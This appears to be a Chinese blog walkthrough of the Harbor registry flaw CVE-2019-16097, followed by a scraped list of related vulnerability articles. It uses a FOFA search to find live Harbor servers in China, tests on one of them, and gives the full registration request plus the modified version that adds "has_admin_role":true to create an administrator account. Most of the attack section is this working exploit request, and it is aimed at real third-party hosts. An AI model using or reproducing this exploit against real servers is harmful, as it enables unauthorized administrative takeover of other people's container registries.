环境准备

fofa搜索环境

title="Harbor" && country=CN

找到一个可用环境测试

测试

注册账号,填写账号信息后抓包

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 111
Connection: close
Referer: https://103.24.179.7/harbor/sign-in?signout=true
Cookie: beegosessionID=c2309d1e5295946e5c1d59e7c63bf5a0{"username":"whami123","email":"whoami123@qq.com","realname":"whoami123","password":"Whoami123_","comment":"2"}

在包内容里面添加"has_admin_role":true,即

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 111
Connection: close
Referer: https://103.24.179.7/harbor/sign-in?signout=true
Cookie: beegosessionID=c2309d1e5295946e5c1d59e7c63bf5a0{"username":"whami123","email":"whoami123@qq.com","realname":"whoami123","password":"Whoami123_","comment":"2","has_admin_role":true}


放包,使用注册账号登录后即为管理员权限

Harbor未授权创建管理员漏洞(CVE-2019-16097)相关推荐

  1. cve-2019-11076 Cribl UI 1.5.0 未授权命令执行漏洞分析

    Cribl是一款日志分析工具.Cribl UI是其中的一个用户界面. Cribl UI 1.5.0版本中存在安全漏洞.远程攻击者可借助未认证的Web请求利用该漏洞运行任意命令. 前言 前几天瞎逛 Gi ...

  2. Cisco ASA/FTD未授权文件删除漏洞简要分析

    漏洞简述 思科官方在2020年5月6号发布Cisco Adaptive Security Appliance(ASA)和Firepower Threat Defense(FTD)软件web服务目录遍历 ...

  3. (转)Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析

    看到官方发布了预警,于是开始了漏洞应急.漏洞描述中指出Confluence Server与Confluence Data Center中的Widget Connector存在服务端模板注入漏洞,攻击者 ...

  4. 注意:宝塔曝未授权访问数据库漏洞,尽快升级版本!

    点击上方蓝色"程序猿DD",选择"设为星标" 回复"资源"获取独家整理的学习资料! 来源 | https://nosec.org/home/ ...

  5. 目标Zookeeper未授权访问(漏洞验证)

    漏洞验证

  6. 常用的30+种未授权访问漏洞汇总

    未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...

  7. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  8. 常用的端口及未授权访问漏洞

    ​ 一.介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞.OpenSSL漏洞 25 SMTP协议 53 ...

  9. 安全扫描失败无法上传_Apache Solr 未授权上传(RCE)漏洞的原理分析与验证

    漏洞简介 Apache Solr 发布公告,旧版本的ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE (远程代码执行). 受影响的版本: Apache Solr6.6.0 ...

  10. Apache Solr 未授权上传(RCE)漏洞(CVE-2020-13957)的原理分析与验证

     聚焦源代码安全,网罗国内外最新资讯! 01 漏洞简介 Apache Solr 发布公告,旧版本的ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE (远程代码执行). 受影 ...

最新文章

  1. P2216 理想的正方形 单调队列 (二维)
  2. jdk与jre的区别(转)
  3. 冒泡排序c++代码_八大排序算法(解释+代码+结果+算法优化)
  4. linux挂载U盘,及乱码问题解决
  5. 嘘,我已经瞒着开发解锁APP日志文件抓取及分析啦!
  6. ORACLE表空间使用量查询SQL
  7. [Z]Java Architecture for XML Binding (JAXB)
  8. 万万没想到一个普通的地区问题,竟然让我们大战了300回合
  9. Day 1:矩阵归零消除序列和
  10. Unity - 射线检测
  11. 苹果开发者账户协议更新
  12. 《SteamVR实战之PMCore》(Yanlz+Unity+XR+SteamVR+VR+AR+MR+Valve+Oculus+立钻哥哥+==)
  13. 休闲——漫威系列观影顺序
  14. C#用于登录数据库的方法
  15. iOS UIAppearance使用详解
  16. python多久更新一次_一学就会的 Python 时间转化总结(超全)
  17. noi2016旷野大作战
  18. 移动硬盘USB经常无法安全弹出
  19. access 2003 取消数据库密码
  20. Linux字符型驱动开发—基于友善之臂2416开发板

热门文章

  1. 2021-11-07 c语言之不变初心数
  2. apache与tomcat动静分离
  3. JSP如何统计页面访问次数
  4. 图灵交互设计丛书《简约至上.交互式设计四策略》
  5. 内网服务器设置proxy权限联通外网
  6. ArcToolbox工具名英汉对应
  7. AVC编码中的规格 :High、Baseline、Main什么意思?还有High@L3.0、High@L4.0、High@L5.1等
  8. JDK8 Stream 效率如何?看了都说好!
  9. 4个角度教你选小程序开发工具?
  10. POI EasyExcel 自定义行列样式 字体样式 宽高 动态头 实时头写入